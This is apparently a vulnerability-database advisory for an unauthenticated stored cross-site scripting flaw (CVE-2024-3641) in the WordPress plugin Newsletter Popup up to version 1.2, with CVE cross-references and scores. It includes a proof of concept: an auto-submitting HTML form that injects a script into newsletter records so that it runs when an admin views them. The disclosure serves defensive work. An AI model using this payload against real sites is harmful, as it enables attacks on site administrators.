Lucene search
Bob MatyasWPEX-ID:F4047F1E-D5EA-425F-8DEF-76DD5E6A497EHistoryApr 25, 2024 - 12:00 a.m.
Newsletter Popup <= 1.2 - Unauthenticated Stored XSS
2024-04-2500:00:00
Bob Matyas
35
newsletter popup
unauthenticated
stored xss
may 09 2024
update
Description The plugin does not sanitise and escape some parameters, which could allow unauthenticated visitors to perform Cross-Site Scripting attacks against admins
1. Make sure there is a newsletter configured with the setting "Email Service > Save to local database"
2. When not logged in, use an HTML file where `<NL_ID>` is a valid newsletter ID:
```
<body onload="document.forms[0].submit()">
<form action="http://example.com/wp-admin/admin-ajax.php" method="post">
<input type="hidden" name="action" value="save_newsletter">
<input type="hidden" name="nl_id" value="<NL_ID>">
<input type="hidden" name="nl_name" value="Unauthenicated">
<input type="hidden" name="nl_data" value='EMAIL%3Dtestemail%2540email.com%26NAME%3D"><script>alert(1234)</script>TIME%3D2024-03-15%252009%253A24%253A36'>
<input type="submit" value="Submit Request">
</body>
```
3. Go to "Newsletter Popup > Local Record"
4. Select "Show Record" and see the XSSRelated
wpvulndb
wpvulndb
Newsletter Popup <= 1.2 - Unauthenticated Stored XSS
2024-04-25 00:00:00
cve
cve
CVE-2024-3641
2024-05-16 06:15:08
nvd
nvd
CVE-2024-3641
2024-05-16 06:15:08
vulnrichment
vulnrichment
CVE-2024-3641 Newsletter Popup <= 1.2 - Unauthenticated Stored XSS
2024-05-16 06:00:01
cvelist
cvelist
CVE-2024-3641 Newsletter Popup <= 1.2 - Unauthenticated Stored XSS
2024-05-16 06:00:01
AI Score
6.3
Confidence
High
EPSS
0
Percentile
9.0%
Related for WPEX-ID:F4047F1E-D5EA-425F-8DEF-76DD5E6A497E